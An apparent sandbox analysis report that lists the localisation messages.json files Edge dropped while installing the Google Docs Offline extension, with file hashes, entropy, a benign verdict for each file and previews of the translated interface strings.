                                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"\u0421\u0422\u0412\u0410\u0420\u042b\u0426\u042c \u041d\u041e\u0412\u042b"},"explanationofflinedisabled":{"message":"\u0412\u044b \u045e \u043f\u0430\u0437\u0430\u0441\u0435\u0442\u043a\u0430\u0432\u044b\u043c \u0440\u044d\u0436\u044b\u043c\u0435. \u041a\u0430\u0431 \u043a\u0430\u0440\u044b\u0441\u0442\u0430\u0446\u0446\u0430 \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u043c\u0456 Google \u0431\u0435\u0437 \u043f\u0430\u0434\u043a\u043b\u044e\u0447\u044d\u043d\u043d\u044f \u0434\u0430 \u0456\u043d\u0442\u044d\u0440\u043d\u044d\u0442\u0443, \u043f\u0435\u0440\u0430\u0439\u0434\u0437\u0456\u0446\u0435 \u0434\u0430 \u043d\u0430\u043b\u0430\u0434 \u043d\u0430 \u0433\u0430\u043b\u043e\u045e\u043d\u0430\u0439 \u0441\u0442\u0430\u0440\u043e\u043d\u0446\u044b \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u045e Google \u0456 \u045e\u043a\u043b\u044e\u0447\u044b\u0446\u0435 \u0441\u0456\u043d\u0445\u0440\u0430\u043d\u0456\u0437\u0430\u0446\u044b\u044e

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2320_1195486961\CRX_INSTALL\_locales\bg\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1389
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.561317517930672
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:1HAp1DQqUfZ+Yann08VOeadclUZbyMzZzsYvwUNn7nOyRK8/nn08V7:g1UTfZ+Ya08Uey3tflCRE08h
                                                                                                                                                                                                                                                                                          MD5:2E6423F38E148AC5A5A041B1D5989CC0
                                                                                                                                                                                                                                                                                          SHA1:88966FFE39510C06CD9F710DFAC8545672FFDCEB
                                                                                                                                                                                                                                                                                          SHA-256:AC4A8B5B7C0B0DD1C07910F30DCFBDF1BCB701CFCFD182B6153FD3911D566C0E
                                                                                                                                                                                                                                                                                          SHA-512:891FCDC6F07337970518322C69C6026896DD3588F41F1E6C8A1D91204412CAE01808F87F9F2DEA1754458D70F51C3CEF5F12A9E3FC011165A42B0844C75EC683
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. .. .......... Google ......... ... ........ ......, ........ ........... . ......... ........ .. Google ......... . ........ ...... .............. ......... ..., ...... ..... ...... . .........".. },.. "explanationofflineenabled": {.. "message": "...... ..., .. ... ...... .. ........... ......... ....... ... .. ......... .....".. },.. "extdesc": {.. "message": "............, .......... . ............ ...... ........., .......... ....... . ........... . ...... .... ... ...... .. .........".. },..

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2320_1195486961\CRX_INSTALL\_locales\bn\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1763
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.25392954144533
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:1HABGtNOtIyHmVd+q+3X2AFl2DhrR7FAWS9+SMzI8QVAEq8yB0XtfOyvU7D:oshmm/+H2Ml2DrFPS9+S99EzBd7D
                                                                                                                                                                                                                                                                                          MD5:651375C6AF22E2BCD228347A45E3C2C9
                                                                                                                                                                                                                                                                                          SHA1:109AC3A912326171D77869854D7300385F6E628C
                                                                                                                                                                                                                                                                                          SHA-256:1DBF38E425C5C7FC39E8077A837DF0443692463BA1FBE94E288AB5A93242C46E
                                                                                                                                                                                                                                                                                          SHA-512:958AA7CF645FAB991F2ECA0937BA734861B373FB1C8BCC001599BE57C65E0917F7833A971D93A7A6423C5F54A4839D3A4D5F100C26EFA0D2A068516953989F9D
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": ".... .... ....".. },.. "explanationofflinedisabled": {.. "message": ".... ....... ....... .... ......... ..... ..... Google ........ ....... ...., Google .......... ........ ....... ... ... .... ... .... ... ........... .... ....... .... ... ...... ..... .... .....".. },.. "explanationofflineenabled": {.. "message": ".... ....... ......, ...... .... .... ...... .......... ........ .... .. .... .... .... .... .......".. },.. "extdesc":

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2320_1195486961\CRX_INSTALL\_locales\ca\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):930
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.569672473374877
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:1HASvggoSCBxNFT0sXuqgEHQ2fTq9blUJYUJaw9CBxejZFPLOjCSUuE44pMiiDat:1HAtqs+BEHGpURxSp1iUPWCAXtRKe
                                                                                                                                                                                                                                                                                          MD5:D177261FFE5F8AB4B3796D26835F8331
                                                                                                                                                                                                                                                                                          SHA1:4BE708E2FFE0F018AC183003B74353AD646C1657
                                                                                                                                                                                                                                                                                          SHA-256:D6E65238187A430FF29D4C10CF1C46B3F0FA4B91A5900A17C5DFD16E67FFC9BD
                                                                                                                                                                                                                                                                                          SHA-512:E7D730304AED78C0F4A78DADBF835A22B3D8114FB41D67B2B26F4FE938B572763D3E127B7C1C81EBE7D538DA976A7A1E7ADC40F918F88AFADEA2201AE8AB47D0
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "CREA'N UN DE NOU".. },.. "explanationofflinedisabled": {.. "message": "No tens connexi.. Per utilitzar Documents de Google sense connexi. a Internet, ves a la configuraci. de la p.gina d'inici d'aquest servei i activa l'opci. per sincronitzar-se sense connexi. la propera vegada que estiguis connectat a la xarxa.".. },.. "explanationofflineenabled": {.. "message": "Tot i que no tens connexi., pots editar o crear fitxers.".. },.. "extdesc": {.. "message": "Edita, crea i consulta documents, fulls de c.lcul i presentacions, tot sense acc.s a Internet.".. },.. "extname": {.. "message": "Documents de Google sense connexi.".. },.. "learnmore": {.. "message": "M.s informaci.".. },.. "popuphelptext": {.. "message": "Escriu text, edita fitxers i col.labora-hi siguis on siguis, amb o sense connexi. a Internet.".. }..}..

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2320_1195486961\CRX_INSTALL\_locales\cs\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):913
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.947221919047
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:1HASvgdsbCBxNBmobXP15Dxoo60n40h6qCBxeBeGG/9jZCSUKFPDLZ2B2hCBhPLm:1HApJmoZ5e50nzQhwAd7dvYB2kDSGGKs
                                                                                                                                                                                                                                                                                          MD5:CCB00C63E4814F7C46B06E4A142F2DE9
                                                                                                                                                                                                                                                                                          SHA1:860936B2A500CE09498B07A457E0CCA6B69C5C23
                                                                                                                                                                                                                                                                                          SHA-256:21AE66CE537095408D21670585AD12599B0F575FF2CB3EE34E3A48F8CC71CFAB
                                                                                                                                                                                                                                                                                          SHA-512:35839DAC6C985A6CA11C1BFF5B8B5E59DB501FCB91298E2C41CB0816B6101BF322445B249EAEA0CEF38F76D73A4E198F2B6E25EEA8D8A94EA6007D386D4F1055
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "VYTVO.IT".. },.. "explanationofflinedisabled": {.. "message": "Jste offline. Pokud chcete Dokumenty Google pou..vat bez p.ipojen. k.internetu, a. budete p...t. online, p.ejd.te do nastaven. na domovsk. str.nce Dokument. Google a.zapn.te offline synchronizaci.".. },.. "explanationofflineenabled": {.. "message": "Jste offline, ale st.le m..ete upravovat dostupn. soubory nebo vytv..et nov..".. },.. "extdesc": {.. "message": "Upravujte, vytv..ejte a.zobrazujte sv. dokumenty, tabulky a.prezentace . v.e bez p..stupu k.internetu.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Dal.. informace".. },.. "popuphelptext": {.. "message": "Pi.te, upravujte a.spolupracujte kdekoli, s.p.ipojen.m k.internetu i.bez n.j.".. }..}..

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2320_1195486961\CRX_INSTALL\_locales\cy\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):806
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.815663786215102
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:YGo35xMxy6gLr4Dn1eBVa1xzxyn1VFQB6FDVgdAJex9QH7uy+XJEjENK32J21j:Y735+yoeeRG54uDmdXx9Q7u3r83Xj
                                                                                                                                                                                                                                                                                          MD5:A86407C6F20818972B80B9384ACFBBED
                                                                                                                                                                                                                                                                                          SHA1:D1531CD0701371E95D2A6BB5EDCB79B949D65E7C
                                                                                                                                                                                                                                                                                          SHA-256:A482663292A913B02A9CDE4635C7C92270BF3C8726FD274475DC2C490019A7C9
                                                                                                                                                                                                                                                                                          SHA-512:D9FBF675514A890E9656F83572208830C6D977E34D5744C298A012515BC7EB5A17726ADD0D9078501393BABD65387C4F4D3AC0CC0F7C60C72E09F336DCA88DE7
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"createnew":{"message":"CREU NEWYDD"},"explanationofflinedisabled":{"message":"Rydych chi all-lein. I ddefnyddio Dogfennau Google heb gysylltiad \u00e2'r rhyngrwyd, ewch i'r gosodiadau ar dudalen hafan Dogfennau Google a throi 'offine sync' ymlaen y tro nesaf y byddwch wedi'ch cysylltu \u00e2'r rhyngrwyd."},"explanationofflineenabled":{"message":"Rydych chi all-lein, ond gallwch barhau i olygu'r ffeiliau sydd ar gael neu greu rhai newydd."},"extdesc":{"message":"Gallwch olygu, creu a gweld eich dogfennau, taenlenni a chyflwyniadau \u2013 i gyd heb fynediad i'r rhyngrwyd."},"extname":{"message":"Dogfennau Google All-lein"},"learnmore":{"message":"DYSGU MWY"},"popuphelptext":{"message":"Ysgrifennwch, golygwch a chydweithiwch lle bynnag yr ydych, gyda chysylltiad \u00e2'r rhyngrwyd neu hebddo."}}.

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2320_1195486961\CRX_INSTALL\_locales\da\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):883
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.5096240460083905
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:1HA4EFkQdUULMnf1yo+9qgpukAXW9bGJTvDyqdr:zEFkegfw9qwAXWNs/yu
                                                                                                                                                                                                                                                                                          MD5:B922F7FD0E8CCAC31B411FC26542C5BA
                                                                                                                                                                                                                                                                                          SHA1:2D25E153983E311E44A3A348B7D97AF9AAD21A30
                                                                                                                                                                                                                                                                                          SHA-256:48847D57C75AF51A44CBF8F7EF1A4496C2007E58ED56D340724FDA1604FF9195
                                                                                                                                                                                                                                                                                          SHA-512:AD0954DEEB17AF04858DD5EC3D3B3DA12DFF7A666AF4061DEB6FD492992D95DB3BAF751AB6A59BEC7AB22117103A93496E07632C2FC724623BB3ACF2CA6093F3
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "OPRET NYT".. },.. "explanationofflinedisabled": {.. "message": "Du er offline. Hvis du vil bruge Google Docs uden en internetforbindelse, kan du g. til indstillinger p. startsiden for Google Docs og aktivere offlinesynkronisering, n.ste gang du har internetforbindelse.".. },.. "explanationofflineenabled": {.. "message": "Du er offline, men du kan stadig redigere tilg.ngelige filer eller oprette nye.".. },.. "extdesc": {.. "message": "Rediger, opret og se dine dokumenter, regneark og pr.sentationer helt uden internetadgang.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "F. flere oplysninger".. },.. "popuphelptext": {.. "message": "Skriv, rediger og samarbejd, uanset hvor du er, og uanset om du har internetforbindelse.".. }..}..

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2320_1195486961\CRX_INSTALL\_locales\de\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1031
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.621865814402898
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:1HA6sZnqWd77ykJzCkhRhoe1HMNaAJPwG/p98HKpy2kX/R:WZqWxykJzthRhoQma+tpyHX2O/R
                                                                                                                                                                                                                                                                                          MD5:D116453277CC860D196887CEC6432FFE
                                                                                                                                                                                                                                                                                          SHA1:0AE00288FDE696795CC62FD36EABC507AB6F4EA4
                                                                                                                                                                                                                                                                                          SHA-256:36AC525FA6E28F18572D71D75293970E0E1EAD68F358C20DA4FDC643EEA2C1C5
                                                                                                                                                                                                                                                                                          SHA-512:C788C3202A27EC220E3232AE25E3C855F3FDB8F124848F46A3D89510C564641A2DFEA86D5014CEA20D3D2D3C1405C96DBEB7CCAD910D65C55A32FDCA8A33FDD4
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "NEU ERSTELLEN".. },.. "explanationofflinedisabled": {.. "message": "Sie sind offline. Um Google Docs ohne Internetverbindung zu verwenden, gehen Sie auf der Google Docs-Startseite auf \"Einstellungen\" und schalten die Offlinesynchronisierung ein, wenn Sie das n.chste Mal mit dem Internet verbunden sind.".. },.. "explanationofflineenabled": {.. "message": "Sie sind offline, aber k.nnen weiterhin verf.gbare Dateien bearbeiten oder neue Dateien erstellen.".. },.. "extdesc": {.. "message": "Mit der Erweiterung k.nnen Sie Dokumente, Tabellen und Pr.sentationen bearbeiten, erstellen und aufrufen.. ganz ohne Internetverbindung.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Weitere Informationen".. },.. "popuphelptext": {.. "message": "Mit oder ohne Internetverbindung: Sie k.nnen von .berall Dokumente erstellen, .ndern und zusammen mit anderen

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2320_1195486961\CRX_INSTALL\_locales\el\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1613
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.618182455684241
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:1HAJKan4EITDZGoziRAc2Z8eEfkTJfLhGX7b0UBNoAcGpVyhxefSmuq:SKzTD0IK85JlwsGOUyaSk
                                                                                                                                                                                                                                                                                          MD5:9ABA4337C670C6349BA38FDDC27C2106
                                                                                                                                                                                                                                                                                          SHA1:1FC33BE9AB4AD99216629BC89FBB30E7AA42B812
                                                                                                                                                                                                                                                                                          SHA-256:37CA6AB271D6E7C9B00B846FDB969811C9CE7864A85B5714027050795EA24F00
                                                                                                                                                                                                                                                                                          SHA-512:8564F93AD8485C06034A89421CE74A4E719BBAC865E33A7ED0B87BAA80B7F7E54B240266F2EDB595DF4E6816144428DB8BE18A4252CBDCC1E37B9ECC9F9D7897
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": ".......... ....".. },.. "explanationofflinedisabled": {.. "message": "..... ..... ......... ... .. ............... .. ....... Google ..... ....... ... ........., ......... .... ......... .... ...... ...... ... ........ Google ... ............. ... ........... ..... ........ ... ....... .... ... .. ..... ............ ... ..........".. },.. "explanationofflineenabled": {.. "message": "..... ..... ........ .... ........ .. .............. .. ......... ...... . .. ............. ... .......".. },.. "extdesc": {.. "message": ".............., ............ ... ..... .. ......., .

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2320_1195486961\CRX_INSTALL\_locales\en\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):851
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                                                                                                          MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                                                                                          SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                                                                                                          SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                                                                                          SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2320_1195486961\CRX_INSTALL\_locales\en_CA\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):851
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                                                                                                          MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                                                                                          SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                                                                                                          SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                                                                                          SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2320_1195486961\CRX_INSTALL\_locales\en_GB\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):848
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.494568170878587
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:1HASvgg4eCBxNdN3vRyc1NzXW6iFrSCBxesJGceKCSUuvlvOgwCBhUufz1tnaXrQ:1HA3djfR3NzXviFrJj4sJXJ+bA6RM
                                                                                                                                                                                                                                                                                          MD5:3734D498FB377CF5E4E2508B8131C0FA
                                                                                                                                                                                                                                                                                          SHA1:AA23E39BFE526B5E3379DE04E00EACBA89C55ADE
                                                                                                                                                                                                                                                                                          SHA-256:AB5CDA04013DCE0195E80AF714FBF3A67675283768FFD062CF3CF16EDB49F5D4
                                                                                                                                                                                                                                                                                          SHA-512:56D9C792954214B0DE56558983F7EB7805AC330AF00E944E734340BE41C68E5DD03EDDB17A63BC2AB99BDD9BE1F2E2DA5BE8BA7C43D938A67151082A9041C7BA
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an Internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the Internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create and view your documents, spreadsheets and presentations . all without Internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn more".. },.. "popuphelptext": {.. "message": "Write, edit and collaborate wherever you are, with or without an Internet connection.".. }..}..

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2320_1195486961\CRX_INSTALL\_locales\en_US\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1425
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.461560329690825
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:1HA6Krbbds5Kna/BNzXviFrpsCxKU4irpNQ0+qWK5yOJAaCB7MAa6:BKrbBs5Kna/BNzXvi3sCxKZirA0jWK5m
                                                                                                                                                                                                                                                                                          MD5:578215FBB8C12CB7E6CD73FBD16EC994
                                                                                                                                                                                                                                                                                          SHA1:9471D71FA6D82CE1863B74E24237AD4FD9477187
                                                                                                                                                                                                                                                                                          SHA-256:102B586B197EA7D6EDFEB874B97F95B05D229EA6A92780EA8544C4FF1E6BC5B1
                                                                                                                                                                                                                                                                                          SHA-512:E698B1A6A6ED6963182F7D25AC12C6DE06C45D14499DDC91E81BDB35474E7EC9071CFEBD869B7D129CB2CD127BC1442C75E408E21EB8E5E6906A607A3982B212
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createNew": {.. "description": "Text shown in the extension pop up for creating a new document",.. "message": "CREATE NEW".. },.. "explanationOfflineDisabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is disabled.",.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationOfflineEnabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is enabled.",.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extDesc": {.. "description": "Extension description",.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extName": {.. "description": "Extension name",..

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2320_1195486961\CRX_INSTALL\_locales\es\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):961
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.537633413451255
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:1HASvggeCBxNFxcw2CVcfamedatqWCCBxeFxCF/m+rWAaFQbCSUuExqIQdO06stp:1HAqn0gcfa9dc/5mCpmIWck02USfWmk
                                                                                                                                                                                                                                                                                          MD5:F61916A206AC0E971CDCB63B29E580E3
                                                                                                                                                                                                                                                                                          SHA1:994B8C985DC1E161655D6E553146FB84D0030619
                                                                                                                                                                                                                                                                                          SHA-256:2008F4FAAB71AB8C76A5D8811AD40102C380B6B929CE0BCE9C378A7CADFC05EB
                                                                                                                                                                                                                                                                                          SHA-512:D9C63B2F99015355ACA04D74A27FD6B81170750C4B4BE7293390DC81EF4CD920EE9184B05C61DC8979B6C2783528949A4AE7180DBF460A2620DBB0D3FD7A05CF
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "CREAR".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a Configuraci.n en la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que te conectes a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n. Aun as., puedes crear archivos o editar los que est.n disponibles.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones; todo ello, sin acceso a Internet.".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe o edita contenido y colabora con otras personas desde cualquier lugar, con o sin conexi.n a Internet.".. }..}..

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2320_1195486961\CRX_INSTALL\_locales\es_419\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):959
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.570019855018913
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:1HARn05cfa9dcDmQOTtSprj0zaGUSjSGZ:+n0CfMcDmQOTQprj4qpC
                                                                                                                                                                                                                                                                                          MD5:535331F8FB98894877811B14994FEA9D
                                                                                                                                                                                                                                                                                          SHA1:42475E6AFB6A8AE41E2FC2B9949189EF9BBE09FB
                                                                                                                                                                                                                                                                                          SHA-256:90A560FF82605DB7EDA26C90331650FF9E42C0B596CEDB79B23598DEC1B4988F
                                                                                                                                                                                                                                                                                          SHA-512:2CE9C69E901AB5F766E6CFC1E592E1AF5A07AA78D154CCBB7898519A12E6B42A21C5052A86783ABE3E7A05043D4BD41B28960FEDDB30169FF7F7FE7208C8CFE9
